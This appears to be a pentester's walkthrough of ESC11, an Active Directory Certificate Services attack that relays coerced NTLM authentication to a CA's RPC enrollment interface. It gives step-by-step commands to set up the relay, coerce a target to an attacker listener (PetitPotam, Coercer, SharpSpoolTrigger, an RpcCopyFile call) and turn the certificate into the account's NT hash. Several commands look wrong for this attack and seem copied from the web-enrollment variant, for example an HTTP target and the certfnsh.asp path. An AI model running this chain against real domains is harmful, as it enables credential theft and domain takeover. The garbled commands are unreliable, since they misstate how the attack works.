# ESC11 > **TL;DR** > > ESC11 lets you obtain a certificate on behalf of an elevated computer/user account and use that certificate for client authentication using Kerberos. A certificate authority can be vulnerable to ESC11 if the RPC enrollment interface allows NTLM authentication and does not enforce protections such as Extended Protection for Authentication (EPA). This allows an attacker to relay NTLM authentication to the certificate authority's RPC endpoint. To exploit ESC11, we need a method of coercing a target computer to authenticate to an attacker controller computer. This is commonly done by abusing Remote Procedure Call (RPC) interfaces on a computer that would allow the attacker to trigger authentication. {% hint style="info" %} An RPC function, *RpcCopyFile*, exists that takes three arguments: a *SrcFile* UNC path, a *DstFile* UNC path, and any flags you want to give it. The *RpcCopyFile* function will simply attempt to copy the file given in the *SrcFile* path to the location in the *DstFile* path. However, if the *SrcFile* path leads to a different computer, the target computer you send the RPC function to will attempt to get the *SrcFile* from the other computer. Putting it all together, if you want to coerce a target computer to authenticate to your attacker's computer, send them the following RPC function call: *RpcCopyFile(SrcFile="\\\attacker\_ip\share\file.txt", DstFile="C:\Temp\file.txt")* {% endhint %} {% embed url="" %} When the target computer attempts to authenticate to the attacker computer, we will then need to relay the authentication traffic from the target computer to the vulnerable RPC interface. Once the certificate is obtained, we can use the certificate to obtain a Kerberos Ticket Granting Ticket (TGT) for the computer account using the PKINIT Kerberos extension. {% hint style="info" %} Check out [unpac-the-hash](https://stuff.weelee.zip/network/on-prem-active-directory/kerberos/unpac-the-hash "mention") to learn how we can obtain the account's NTLM hash using PKINIT. {% endhint %} ## Exploit ### Set Up Relay On Attacker Computer {% tabs %} {% tab title="Certipy.py" %} {% embed url="" %} {% code title="Linux (Attacker)" %} ```fish certipy relay -target 'http://[CA FDQN]' -template [template] ``` {% endcode %} {% endtab %} {% tab title="ntlmrelayx.py" %} {% embed url="" %} {% code title="Linux (Attacker)" %} ```fish ntlmrelayx.py -t rpc://[CA FDQN]/certsrv/certfnsh.asp ``` {% endcode %} {% hint style="info" %} If you are going to relay authentication from a Domain Controller, you must add \ `--template DomainController` to your command. {% endhint %} {% endtab %} {% tab title="ADCSPwn.exe" %} {% embed url="" %} {% code title="Linux/Windows (Attacker)" %} ``` ADCSPwn.exe --adcs [CA FQDN] ``` {% endcode %} {% hint style="info" %} If successful, *impacket-ntlmrelayx* will give you the obtained certificate in base64 format {% endhint %} {% endtab %} {% endtabs %} ### Coerce A Target Computer To Authenticate to the Attacker's Computer {% tabs %} {% tab title="Coercer" %} {% embed url="" %} {% code title="Linux (Attacker)" %} ```fish Coercer coerce -l [attacker ip] -t [target ip] -u [username] -p [password] -d [domain] ``` {% endcode %} {% endtab %} {% tab title="PetitPotam.py" %} {% embed url="" %} {% code title="Linux (Attacker)" %} ```fish PetitPotam.py [listener] [target] ``` {% endcode %} {% hint style="info" %} Note that there is the OG unauthenticated version of PetitPotam, and there is an authenticated version as well. The command above is leveraging the unauthenticated version. {% endhint %} {% endtab %} {% tab title="SharpSpoolTrigger.exe" %} {% embed url="" %} {% code title="Windows (Target)" %} ``` SharpSpoolTrigger.exe [target ip] [listener ip] ``` {% endcode %} {% endtab %} {% endtabs %} ### Obtain The Target Computer Account's NT Hash {% tabs %} {% tab title="Certipy.py" %} {% embed url="" %} {% code title="Linux" %} ```fish certipy auth -pfx [.pfx output] -dc-ip [DC IP] ``` {% endcode %} {% hint style="info" %} Takes the certificate in .pfx format {% endhint %} {% endtab %} {% endtabs %}